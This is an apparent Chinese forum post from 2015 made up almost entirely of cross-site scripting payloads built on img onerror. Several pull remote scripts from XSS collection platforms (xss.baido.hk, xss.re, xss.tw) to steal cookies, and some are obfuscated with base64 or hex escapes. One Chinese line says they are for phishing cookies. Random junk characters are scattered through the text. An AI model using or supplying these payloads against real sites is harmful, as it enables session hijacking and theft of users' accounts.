<img src='non-exist.jpg'onerror="alert('xss')">
: j2 r; ]1 t" S9 g& ^, z/ R/ f<img src=# onerror=alert(123)>
7 \& ^( R0 L! z<img src=# onerror=alert(document.cookie)>: S% b$ D' D, v
下面是利用平台钓cookie的
: f. R P/ R! j6 m! T; L$ C/ l <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>$ R% o+ D4 {5 U1 Z8 B7 c
* N2 ?1 M) y# R& p/ B4 N7 d# Q
, ~0 T! S5 u& p/ u) S
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>0 b7 a6 z- s9 l% @
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>8 ]4 r& r _ m! Y' P# [* I
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
; ~5 i. x6 t" z) L- M<img src=1 onerror=jQuery.getScript("//xss.re/974")> 8 ]9 m$ b: ~) ]* X6 h2 o/ ^
<img src="#">- d, A, S- I6 i4 B* l
<img src="#">( d+ r1 e2 |' d& G/ r' }7 \
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
1 h( H7 f+ Y. K; {# M<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
/ z8 P5 i+ a, ?+ u1 K<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>* V+ X" T8 v6 V+ ~7 R
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
2 p9 K _- T# `; z1 L<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
* \& `9 O# M! D) j& B<img src=x width="0" height="0"></img>
o3 O! _+ ~' h" k5 m7 t, A# W( k<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
" O# X+ Y9 _* J1 F3 S' L<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
- J1 l$ z7 X0 D+ y! _! P4 V( c |
发表于 2015-10-18 14:33:54
收藏
支持
反对